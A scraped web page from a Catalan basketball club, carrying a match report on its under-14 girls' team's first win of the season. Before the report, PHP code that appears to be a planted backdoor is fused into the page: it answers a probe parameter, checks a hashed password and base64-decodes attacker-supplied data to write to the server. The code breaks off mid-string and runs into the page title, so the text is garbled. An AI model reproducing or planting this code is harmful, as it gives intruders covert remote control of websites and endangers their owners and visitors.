function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'Infantil Femení 08A guanya el seu primer partit de la temporada contra el Manresa CBF U14 (37-39) - Tgn Bàsquet Club -

L’Infantil Femení 08A guanya el seu primer partit de la temporada contra el Manresa CBF U14 (37-39)

Updated: febrer 8, 2022

L’Infantil Femení 08A, en un final d’infart, acaba guanyant el seu primer partit contra el Manresa CBF. Les liles van comennçar molt desencertades, amb problemes en el rebot i algunes pèrdues de pilotes que van deixar una gran desavantatge inicial per a l’equip del TGN (12-4). Va ser en el segon període on les visitants van despertar i van trobar bones opcions de tir gràcies a la bona circulació de la pilota i a jugar en equip. La defensa va ser la clau per a posar-se a tant sols un punt de les manresanes, ja que apretant a  tota la pista van aconseguir robar moltes pilotes i generar contraatacs clars. Després del descans les locals van sortir molt decidides i van mantenir-se per davant del marcador. Però tot i els entrevancs arbitrals les noies entrenades per García, van poder empatar el partit al minut tres de l’últim període i mantenir-se guanyant fins l’últim minut, mostrant-se superiors a les contrincants. Les els tirs lliures van permetre el rival estar a punt d’empatar el partit però finalment la victòria es va decantar per a l’equip lila que després de tants mesos han aconseguit la seva primera victòria a la categoria preferent B.